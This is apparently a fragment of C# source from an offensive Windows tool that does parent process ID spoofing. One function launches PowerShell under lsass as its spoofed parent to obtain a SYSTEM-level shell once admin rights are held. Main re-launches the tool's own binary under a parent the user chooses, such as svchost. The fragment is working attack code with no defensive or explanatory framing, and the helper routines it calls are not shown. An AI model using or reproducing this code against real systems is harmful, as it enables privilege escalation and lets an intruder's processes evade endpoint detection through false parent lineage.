public static void EasySystemPPID() { if (!WindowsIdentity.GetCurrent().Owner.IsWellKnown(WellKnownSidType.BuiltinAdministratorsSid)) { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("\n[!] For this function to succeed, you need UAC Elevated Administrator privileges."); Console.ResetColor(); return; } string szCommandLine = "powershell.exe"; string PPIDName = "lsass"; int NewPPID = 0; // Find PID from our new Parent and start new Process with new Parent ID NewPPID = ProcessCreator.NewParentPID(PPIDName); if (NewPPID == 0) { Console.WriteLine("\n[!] No suitable Process ID Found..."); return; } if (!ProcessCreator.CreateProcess(NewPPID, null, szCommandLine)) { Console.WriteLine("\n[!] Oops PPID Spoof failed..."); return; } return; }
public static void Main(string[] args) { // Get Assembly Path string BinaryPath = Assembly.GetExecutingAssembly().CodeBase; string lpApplicationName = BinaryPath.Replace("file:///", string.Empty).Replace("/", @"\"); if (args.Length == 1 && args[0].ToLower() == "-parent") { Console.WriteLine("\n [+] Please enter a valid Parent Process name."); Console.WriteLine(" [+] For Example: {0} -parent svchost", lpApplicationName); return; } else if (args.Length == 2) { if (args[0].ToLower() == "-parent" && args[1] != null) { string PPIDName = args[1]; int NewPPID = 0; // Find PID from our new Parent and start new Process with new Parent ID NewPPID = ProcessCreator.NewParentPID(PPIDName); if (NewPPID == 0) { Console.WriteLine("\n [!] No suitable Process ID Found..."); return; } if (!ProcessCreator.CreateProcess(NewPPID, lpApplicationName, null)) { Console.WriteLine("\n [!] Oops PPID Spoof failed..."); return; } } } else { Entry(); } return; }